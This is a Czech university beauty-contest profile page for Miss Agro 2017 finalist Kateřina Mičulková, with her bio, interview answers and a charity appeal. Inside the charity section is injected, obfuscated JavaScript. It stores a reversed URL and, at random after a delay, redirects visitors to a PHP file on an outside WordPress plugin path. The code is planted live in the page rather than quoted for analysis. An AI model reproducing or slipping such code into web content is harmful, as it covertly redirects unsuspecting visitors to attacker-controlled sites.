Kateřina Mičulková

Profil

Fotografie

Fakulta: FAPPZ
Obor: Biotechnologie a šlechtění zvířat (AMGP)
Ročník: 5.
Věk:
26

Katka je holka z Beskyd, která má ráda hory, zvířata, dobré jídlo, hořké pivo a sladký spánek. Třikrát zdolala závod Spartan race, ale zjistila, že ji z toho bolí kolena, tak teď raději jen chodí na procházky se svými psy a občas do sauny. Věří, že na každém člověku a obecně na všem se dá najít něco pozitivního a dobrého… a tak se o to snaží.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523407726{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2017?

To je otázka, kterou už jsem sice jednou dostala, ale odpověď pořád neznám. Přihlášením do soutěže jsem si chtěla udělat takovou malou osobní radost a získat zkušenost z castingu (protože jsem nikdy v podobné soutěži nebyla). A popravdě jsem si spíš myslela, že z toho ani víc nebude a nikdo se o tom nedozví. Jen samotná účast a postup do finálové desítky je nakonec moc fajn zkušenost. Na rozmýšlení komu a proč k ní přibyde ještě titul vítězky jsou určeni jiní, a tak jim to raději přenechám.

Kdyby ses mohla narodit ještě jednou, kým bys chtěla být?

Chtěla bych být zase sama sebou. Protože mám svůj život ráda takový, jaký je. A taky protože být někým jiným bych prostě neuměla.

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

ČZU jsem si vybrala, protože už od dítěte mám ráda zvířata a chtěla jsem se práci s nimi v životě věnovat. Původně jsem hledala jen nějaký přírodovědný obor a rozhodovala se mezi Ostravskou přírodovědeckou fakultou, zemědělkou v Praze a Brně, ale po dni otevřených dveří na FAPPZ jsem se jednoznačně rozhodla pro ČZU a do Brna a Ostravy jsem se ani nezajela podívat 🙂 Připadala jsem si v kampusu tak nějak doma, a to je možná právě to, co na univerzitě mám nejraději.